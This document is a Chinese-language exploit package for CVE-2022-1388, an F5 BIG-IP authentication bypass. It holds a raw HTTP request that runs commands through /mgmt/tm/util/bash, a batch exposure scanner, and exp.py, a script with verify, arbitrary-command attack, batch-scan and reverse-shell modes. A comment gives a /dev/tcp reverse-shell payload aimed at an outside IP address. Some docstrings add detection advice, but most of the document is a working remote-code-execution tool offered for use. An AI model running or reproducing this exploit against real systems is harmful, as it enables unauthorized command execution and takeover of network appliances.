CVE-2022-1388-EXP(F5-BIGIP)

简介


F5 BIG-IP 是美国 F5 公司的一款集成流量管理、DNS、出入站规则、Web 应用防火墙、Web 网关、负载均衡等功能的应用交付平台。

EXP

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46

Connection: keep-alive, x-F5-Auth-Token
Content-Length: 0
Cache-Control: max-age=0
{
"command":"run",
"utilCmdArgs":"-c id"
}

批量脚本

check.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time    : 2022/5/7 23:40
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : check.py
# @Software: PyCharm
import requests
import argparse

# Silences urllib3's InsecureRequestWarning: every request below passes
# verify=False, so server certificates are never validated.
requests.packages.urllib3.disable_warnings()


def usage():
    """Print the help banner listing the two supported invocation forms."""
    banner = '''
    +-----------------------------------------------------------------+
    漏洞名称: F5 BIG-IP iControl Rest API exposed Check
    功能:单个检测,批量检测                                     
    单个检测:python exp.py -u url
    批量检测:python exp.py -f url.txt
    +-----------------------------------------------------------------+                                     
    '''
    print(banner)


def check(url):
    """Report whether *url* exposes the iControl REST login endpoint.

    Sends one unauthenticated GET to /mgmt/shared/authn/login (TLS
    verification off, 3 s timeout) and prints a single coloured line:
    "exposed" when the body contains "resterrorresponse", "not
    vulnerability" otherwise, and "Connection Fail" when anything raises
    (network error, timeout, or a URL without a scheme).
    """
    exposed_fmt = "\033[0;31;22m[+] Host: {} F5 iControl Rest API exposed \033[0m"
    clean_fmt = "\033[0;32;22m[-] Host: {} F5 not vulnerability \033[0m"
    failed_fmt = "\033[0;33;22m[x] Host: {} Connection Fail \033[0m"
    try:
        reply = requests.get(url + "/mgmt/shared/authn/login", verify=False, timeout=3)
        verdict = exposed_fmt if "resterrorresponse" in reply.text else clean_fmt
    except Exception:
        verdict = failed_fmt
    print(verdict.format(url))


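def run(filepath):
    """Call check() on every non-blank line of *filepath*.

    The file is read inside a ``with`` block so the handle is always
    closed (the original left it open).  Blank lines are skipped instead
    of being passed to check() as an empty URL.  Returns the check
    function, as the original did, so existing callers are unaffected.
    """
    with open(filepath, "r") as handle:
        targets = [line.strip() for line in handle]
    for target in targets:
        if target:
            check(target)
    return check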


def main():
    """Parse -u/-f and dispatch: a single URL to check(), a file to run(), else usage()."""
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--url", help="Please Poc.py -u host")
    cli.add_argument("-f", "--file", help="Please poc.py -f file")
    options = cli.parse_args()
    have_url = options.url is not None
    have_file = options.file is not None
    # Exactly one of the two inputs must be present; anything else prints help.
    if have_url and not have_file:
        check(options.url)
    elif have_file and not have_url:
        run(options.file)
    else:
        usage()


# Script entry point: parse the CLI and dispatch to check()/run()/usage().
if __name__ == '__main__':
    main()

exp.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved 
#
# @Time    : 2022/5/9 16:52
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : CVE-2022-1388.py
# @Software: PyCharm
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silences the InsecureRequestWarning: every request in this file passes
# verify=False, so the target's TLS certificate is never validated.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# NOTE(review): t is assigned at import time but never read anywhere in this file.
t = int(time.time())


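def title():
    """Print the ASCII banner and the four usage lines.

    The banner is a raw string: the original used a normal triple-quoted
    literal whose ``\\|``, ``\\/``, ``\\_`` and ``\\ `` sequences are invalid
    escapes (DeprecationWarning, SyntaxWarning on 3.12+).  The single
    ``\\\\`` in the original is written as one backslash here so the printed
    text is unchanged.
    """
    print(r'''
     _____  _   _  _____        _____  _____  _____  _____        __   _____  _____  _____ 
    /  __ \| | | ||  ___|      / __  \|  _  |/ __  \/ __  \      /  | |____ ||  _  ||  _  |
    | /  \/| | | || |__  ______`' / /'| |/' |`' / /'`' / /'______`| |     / / \ V /  \ V / 
    | |    | | | ||  __||______| / /  |  /| |  / /    / / |______|| |     \ \ / _ \  / _ \ 
    | \__/\ \_/ /| |___       ./ /___\ |_/ /./ /___./ /___      _| |_.___/ /| |_| || |_| |
     \____/ \___/ \____/       \_____/ \___/ \_____/\_____/      \___/\____/ \_____/\_____/                                                                                                                                                                                                                                                          
                                                        Author:Caps@BUGFOR
                                                        Github:https://github.com/bytecaps
    ''')
    print('''
        验证模式:python CVE_2022_1388.py -v true -u target_url 
        攻击模式:python CVE_2022_1388.py -a true -u target_url -c command 
        批量检测:python CVE_2022_1388.py -s true -f file
        反弹模式:python CVE_2022_1388.py -r true -u target_url -c command 
        ''')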


def headers():
    """Return the HTTP headers every request in this file sends.

    Besides a browser-like User-Agent and a JSON content type, the dict
    carries the three headers that form the CVE-2022-1388 request
    signature: ``Connection: keep-alive, x-F5-Auth-Token``, a dummy
    ``X-F5-Auth-Token``, and ``Authorization: Basic YWRtaW46`` (base64 of
    ``admin:``).  Management-plane logging and filtering rules should key
    on that combination.
    """
    browser_like_ua = (
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
    )
    return {
        "User-Agent": browser_like_ua,
        'Content-Type': 'application/json',
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46',
    }


def check(target_url):
    """Probe *target_url* for CVE-2022-1388 and print the verdict.

    Unlike check.py's passive probe, this "check" is not read-only: it
    posts ``{"command": "run", "utilCmdArgs": "-c id"}`` to
    /mgmt/tm/util/bash with the headers() signature and treats a 200
    whose body contains "commandResult" as vulnerable.  Any exception from
    the request (connection error, timeout, missing scheme) is reported as
    "url 访问异常"; a non-string *target_url* raises TypeError on the first
    line, outside the try.  TLS verification is off (verify=False).
    On the defending side, a POST to /mgmt/tm/util/bash carrying
    ``Connection: keep-alive, x-F5-Auth-Token`` is the event to alert on,
    and the /mgmt interface should not be reachable from untrusted networks.
    """
    check_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
        # 200 plus a commandResult field means the bash utility ran the call
        if response.status_code == 200 and 'commandResult' in response.text:
            print("[+] 目标 {} 存在漏洞".format(target_url))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def attack(target_url, cmd):
    """Send *cmd* through the same endpoint as check() and print the output.

    The command is wrapped as ``-c '<cmd>'`` in utilCmdArgs and posted to
    /mgmt/tm/util/bash with the headers() signature.  On a 200 whose body
    contains "commandResult" the JSON is parsed and that field is printed;
    every other status prints "不存在漏洞".  Exceptions from the request are
    reported as "url 访问异常"; a non-string *target_url* raises TypeError on
    the first line, outside the try.  Same detection point as check(): the
    POST to /mgmt/tm/util/bash with the bypass headers.
    """
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            # response.json() would give the same dict; the field holds the command's stdout
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def reverse_shell(target_url, command):
    """Post *command* to /mgmt/tm/util/bash and discard the reply.

    Same request shape and headers() signature as check()/attack(); the
    response is not read.  The "[+] 请自行查看..." line is printed only when
    the POST raises — presumably the 5 s timeout when the command keeps the
    connection open — so a request that returns normally prints nothing at
    all.  Detection is identical to check(): the POST to /mgmt/tm/util/bash
    with the bypass headers.
    """
    reverse_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
    try:
        requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
    except Exception as e:
        # Reached on timeout / connection error, not on a successful reply.
        print("[+] 请自行查看是否反弹shell回来")


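def scan(file):
    """Run check() against every non-blank line of *file*.

    Each line is stripped, normalised with format_url() and handed to
    check(); blank lines are skipped.  The file is opened in a ``with``
    block so the handle is released even if check() raises (the original
    never closed it), and a line format_url() could not normalise (it
    returns None) is skipped instead of crashing check().
    """
    with open(file, 'r', encoding='utf-8') as handle:
        for raw_line in handle:
            target = raw_line.strip()
            if not target:
                continue
            url_path = format_url(target)
            if url_path is None:
                continue
            check(url_path)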


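def format_url(url):
    """Return *url* stripped and prefixed with https:// when it has no scheme.

    Only an explicit ``http://`` or ``https://`` prefix (case-insensitive)
    counts as a scheme.  A non-string argument prints the original
    "URL 错误" message and returns None, matching the old except path.
    """
    if not isinstance(url, str):
        print('URL 错误 {0}'.format(url))
        return None
    cleaned = url.strip()
    # Testing only the first four characters for "http" would let hosts
    # such as "httpbin.org" through without a scheme.
    if not cleaned.lower().startswith(("http://", "https://")):
        cleaned = "https://" + cleaned
    return cleaned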


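def _flag(text):
    """argparse ``type=`` converter for the true/false mode switches.

    argparse hands the raw string to the converter; the original
    ``type=bool`` turned every non-empty value — including "false" — into
    True.  Accepts true/1/yes/y and false/0/no/n (case-insensitive) and
    rejects anything else with a usage error.
    """
    value = text.strip().lower()
    if value in ("true", "1", "yes", "y"):
        return True
    if value in ("false", "0", "no", "n"):
        return False
    raise argparse.ArgumentTypeError("expected true or false, got {0!r}".format(text))


def main():
    """Parse the command line and dispatch to one of the four modes.

    First match wins, in this order: ``-v`` → check(), ``-a`` → attack(),
    ``-s`` → scan(), ``-r`` → reverse_shell().  ``-c`` defaults to "id", so
    the attack and shell branches only require ``-u``.  When no branch
    matches, the parser help is printed (the original exited silently) and
    the process exits with status 0.
    """
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=_flag, help=' 验证模式 ')
    parser.add_argument('-u', '--url', type=str, help=' 目标URL ')

    parser.add_argument('-a', '--attack', type=_flag, help=' 攻击模式 ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')

    parser.add_argument('-s', '--scan', type=_flag, help=' 批量模式 ')
    parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')

    parser.add_argument('-r', '--shell', type=_flag, help=' 反弹shell模式 ')
    args = parser.parse_args()

    url = args.url
    command = args.command
    file = args.file

    if args.verify is True and url is not None:
        check(url)
    elif args.attack is True and url is not None and command is not None:
        attack(url, command)
    elif args.scan is True and file is not None:
        scan(file)
    elif args.shell is True and url is not None and command is not None:
        reverse_shell(url, command)
    else:
        parser.print_help()
        sys.exit(0)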


# Script entry point: print the banner, then dispatch on the CLI flags.
if __name__ == '__main__':
    title()
    main()

参考文章：《BIG-IP (CVE-2022-1388) 从修复方案分析出 EXP》——从官方修复方案逐步推测、分析攻击 payload：https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q
